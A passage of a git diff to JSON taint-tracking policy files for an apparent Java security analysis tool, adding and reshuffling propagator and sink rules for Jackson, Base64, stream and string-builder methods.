"com.fasterxml.jackson.databind.JsonNode.asToken()" }, { "command": "", @@ -3674,42 +5454,35 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "base64-dec" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.JsonNode.binaryValue()" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Encoder.encode(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.deepCopy()" }, { "command": "", @@ -3717,17 +5490,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P2", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Encoder.encode(byte[],byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.elements()" }, { "command": "", @@ -3735,17 +5508,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Encoder.encode(java.nio.ByteBuffer)" + "value": "com.fasterxml.jackson.databind.JsonNode.fieldNames()" }, { "command": "", @@ -3753,17 +5526,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.util.Base64$Encoder.encodeToString(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.fields()" }, { "command": "", @@ -3771,17 +5544,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.findPath(java.lang.String)" }, { "command": "", @@ -3789,17 +5562,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValue(java.lang.String)" }, { "command": "", @@ -3807,17 +5580,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValues(java.lang.String)" }, { "command": "", @@ -3825,17 +5598,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean,int)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValues(java.lang.String,java.util.List)" }, { "command": "", @@ -3843,17 +5616,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.findValuesAsText(java.lang.String)" }, { "command": "", @@ -3861,17 +5634,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[],int,int)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValuesAsText(java.lang.String,java.util.List)" }, { "command": "", @@ -3879,17 +5652,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(java.lang.Object)" + "value": "com.fasterxml.jackson.databind.JsonNode.get(int)" }, { "command": "", @@ -3897,17 +5670,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encodeAsString(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.get(java.lang.String)" }, { "command": "", @@ -3915,42 +5688,35 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encodeToString(byte[])" - } - ], - "enable": 1, - "type": 1, - "value": "base64-enc" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.JsonNode.iterator()" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.awt.Desktop.browse(java.net.URI)" + "value": "com.fasterxml.jackson.databind.JsonNode.path(int)" }, { "command": "", @@ -3958,17 +5724,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.path(java.lang.String)" }, { "command": "", @@ -3976,17 +5742,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1,2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,java.lang.ProcessBuilder$Redirect[],boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.textValue()" }, { "command": "", @@ -3994,17 +5760,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String)" + "value": "com.fasterxml.jackson.databind.JsonNode.toString()" }, { "command": "", @@ -4012,17 +5778,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1,2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[])" + "value": "com.fasterxml.jackson.databind.JsonNode.traverse()" }, { "command": "", @@ -4030,17 +5796,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1,2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[],java.io.File)" + "value": "com.fasterxml.jackson.databind.JsonNode.with(java.lang.String)" }, { "command": "", @@ -4048,17 +5814,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[])" + "value": "com.fasterxml.jackson.databind.JsonNode.withArray(java.lang.String)" }, { "command": "", @@ -4068,15 +5834,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.createDeserializationContext(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationConfig)" }, { "command": "", @@ -4084,42 +5850,35 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "P1,2", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[],java.io.File)" - } - ], - "enable": 1, - "type": 4, - "value": "cmd-injection" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,java.lang.Class)" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P2", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.Object,com.alibaba.fastjson.parser.JSONLexer,com.alibaba.fastjson.parser.ParserConfig)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.core.type.TypeReference)" }, { "command": "", @@ -4127,17 +5886,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.String,com.alibaba.fastjson.parser.ParserConfig,int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", @@ -4147,7 +5906,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4155,7 +5914,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldBigInteger(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,java.lang.Class)" }, { "command": "", @@ -4163,9 +5922,9 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4173,7 +5932,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDate(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", @@ -4183,7 +5942,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4191,7 +5950,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDecimal(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" }, { "command": "", @@ -4201,7 +5960,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4209,7 +5968,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDouble(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,com.fasterxml.jackson.core.type.TypeReference)" }, { "command": "", @@ -4219,7 +5978,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4227,7 +5986,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", @@ -4237,7 +5996,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4245,7 +6004,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray2(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", @@ -4255,7 +6014,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4263,7 +6022,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldInt(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,java.lang.Class)" }, { "command": "", @@ -4273,7 +6032,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4281,7 +6040,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldIntArray(char[])" + "value": "com.fasterxml.jackson.databind.deser.ValueInstantiator.createUsingDefault(com.fasterxml.jackson.databind.DeserializationContext)" }, { "command": "", @@ -4291,7 +6050,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4299,7 +6058,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldLong(char[])" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,java.lang.Class)" }, { "command": "", @@ -4309,7 +6068,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4317,7 +6076,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldString(char[])" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,org.codehaus.jackson.type.JavaType)" }, { "command": "", @@ -4327,7 +6086,7 @@ "ignore_internal": false, "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -4335,7 +6094,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.scanFieldFloat(char[])" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,org.codehaus.jackson.type.TypeReference)" }, { "command": "", @@ -4343,32 +6102,25 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P4", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "com.alibaba.fastjson.util.IOUtils.decodeUTF8(byte[],int,int,char[])" - } - ], - "enable": 1, - "type": 1, - "value": "com.alibaba.fastjson" - }, - { - "details": [ + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],java.lang.Class)" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], @@ -4378,7 +6130,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.InputStream)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],org.codehaus.jackson.type.JavaType)" }, { "command": "", @@ -4396,7 +6148,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.JsonDeserializer.deserialize(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationContext)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],org.codehaus.jackson.type.TypeReference)" }, { "command": "", @@ -4404,7 +6156,7 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], @@ -4414,7 +6166,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.createDeserializationContext(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationConfig)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" }, { "command": "", @@ -4422,7 +6174,7 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], @@ -4432,7 +6184,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.databind.JavaType)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,java.lang.Class)" }, { "command": "", @@ -4450,7 +6202,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,org.codehaus.jackson.type.JavaType)" }, { "command": "", @@ -4468,15 +6220,22 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.databind.JavaType)" - }, + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,org.codehaus.jackson.type.TypeReference)" + } + ], + "enable": 1, + "type": 1, + "value": "com.fasterxml.jackson" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", "stack_blacklist": [], @@ -4486,7 +6245,7 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,java.lang.Class)" + "value": "com.google.gson.Gson.fromJson(java.io.Reader,java.lang.Class)" }, { "command": "", @@ -4494,7 +6253,7 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", "stack_blacklist": [], @@ -4504,15 +6263,8 @@ "track": "false", "type": 1, "untags": [], - "value": "com.fasterxml.jackson.databind.deser.ValueInstantiator.createUsingDefault(com.fasterxml.jackson.databind.DeserializationContext)" - } - ], - "enable": 1, - "type": 1, - "value": "com.fasterxml.jackson" - }, - { - "details": [ + "value": "com.google.gson.Gson.fromJson(java.lang.String,java.lang.Class)" + }, { "command": "", "created_by": 1, @@ -6906,6 +8658,24 @@ "untags": [], "value": "java.io.InputStream.(java.io.InputStream)" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P1", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.InputStream.read(byte[])" + }, { "command": "", "created_by": 1, @@ -6924,6 +8694,24 @@ "untags": [], "value": "java.io.InputStream.read(byte[],int,int)" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P1", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.InputStream.transferTo(java.io.OutputStream)" + }, { "command": "", "created_by": 1, @@ -6942,6 +8730,24 @@ "untags": [], "value": "java.io.InputStreamReader.(java.io.InputStream)" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" + }, { "command": "", "created_by": 1, @@ -7014,6 +8820,24 @@ "untags": [], "value": "java.io.PipedInputStream.read(byte[],int,int)" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.PipedInputStream.receive(byte[],int,int)" + }, { "command": "INSERT(0,P2,P3)", "created_by": 1, @@ -7032,6 +8856,24 @@ "untags": [], "value": "java.io.PipedReader.read(char[],int,int)" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.PipedReader.receive(char[],int,int)" + }, { "command": "", "created_by": 1, @@ -7086,6 +8928,24 @@ "untags": [], "value": "java.io.Reader.read(char[])" }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "P1", + "track": "false", + "type": 1, + "untags": [], + "value": "java.io.Reader.transferTo(java.io.Writer)" + }, { "command": "", "created_by": 1, diff --git a/static/data/java_policy.json b/static/data/java_policy.json index b61c13ff0..67ff3652d 100644 --- a/static/data/java_policy.json +++ b/static/data/java_policy.json @@ -60,6 +60,19 @@ }, { "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "java.nio.ByteBuffer.array()" + }, { "command": "SUBSET(P2,P3)", "ignore_blacklist": false, @@ -1648,6 +1661,127 @@ }, { "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "com.bea.jsptools.tree.TreeNode.htmlChars(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],com.fasterxml.jackson.core.type.TypeReference)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],com.fasterxml.jackson.databind.JavaType)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,com.fasterxml.jackson.core.type.TypeReference)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,com.fasterxml.jackson.databind.JavaType)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.core.type.TypeReference)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.core.type.TypeReference)" + }, { "command": "", "ignore_blacklist": false, @@ -1661,6 +1795,101 @@ "untags": [], "value": "com.github.pagehelper.parser.CountSqlParser.getSmartCountSql(java.lang.String,java.lang.String)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "com.opensymphony.util.TextUtils.htmlEncode(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.append(java.lang.CharSequence)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.append(java.lang.CharSequence,int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.toCharArray()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.toString()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.write(char[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.CharArrayWriter.write(java.lang.String,int,int)" + }, { "command": "APPEND()", "ignore_blacklist": false, @@ -2024,85 +2253,71 @@ "track": "", "untags": [], "value": "java.lang.StringBuilder.toString()" - } - ], - "enable": 1, - "type": 1, - "value": "StringBuilder" - }, - { - "details": [ + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "org.apache.struts2.dispatcher.multipart.MultiPartRequest.getParameterValues(java.lang.String)" - } - ], - "enable": 1, - "type": 2, - "value": "Struts2" - }, - { - "details": [ + "value": "java.lang.StringTokenizer.nextElement()" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "java.net.URI.(java.lang.String)" + "value": "java.lang.StringTokenizer.nextToken()" }, { "command": 